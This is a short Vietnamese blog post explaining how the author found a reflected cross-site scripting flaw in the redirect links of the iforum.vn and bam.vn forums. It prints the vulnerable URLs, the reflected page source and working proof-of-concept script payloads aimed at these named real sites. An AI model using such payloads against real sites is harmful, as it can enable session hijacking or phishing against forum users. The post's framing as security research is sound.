Tôi Đã Hack Iforum Bam.vn Ra Sao

sau khi tôi mò lỗi ra một số drok để tìm lỗi xss trên các web dùng xenforo thì cũng thấy thêm một cái hay ho trên iforum cũng gần giống lỗi trên nhưng nó khác chút bây giowf mình sẽ phân tích nhé!

đầu tiên khi mình vào link chuyển trang của iforum

http://iforum.vn/link/?url=

thì mình nghĩ ngay tới XSS nhưng test kiểu gì nó cũng không bị lỗi

http://iforum.vn/link/?url=<script>alert(1);</script>

chả nhẽ admin đã fix nhưng mình xem mã nguồn và thấy đoạn mã nguồn sau

<a href="<script>alert(1);</script>" class="GFNSkip" rel="nofollow"><script>alert(1);</script></a></p>
và thấy đoạn truy vấn xss nằm trong thuộc tính href nhưng sao test lại không lỗi?

test thử link

http://iforum.vn/link/?url=http://<xxx>

thì thấy nó chỉ hiện chữ http:// nghĩa là đằng sau nó hoàn toàn có thể run được nếu để trong 1 thẻ đóng bởi 2 dấu <>

=> vul
http://iforum.vn/link/?url=http://%3Cscript%3Ealert%281%29;%3C/script%3E


vậy là song cái diễn đàn này rồi nhé :)


tương tự như vậy bam.vn

http://bam.vn/redirect/?url=http://%3Cscript%3Ealert%281%29;%3C/script%3E

Share on Google Plus

About Vo Uu

Tác Giả là người chuyên nghiên cứu về các kỹ thuật hacking, security, marketing, là người có góc nhìn lạ và đi sâu vấn đề cũng như là một con người thẳng thắn góp ý. Nếu sử dụng bài trên blog mong các bạn dẫn lại nguồn tác giả!!! Tác Giả rất mong có sự đóng góp hội ý từ cộng đồng để cho an toàn an ninh mạng việt nam ngày càng được an toàn hơn!!

0 nhận xét:

Post a Comment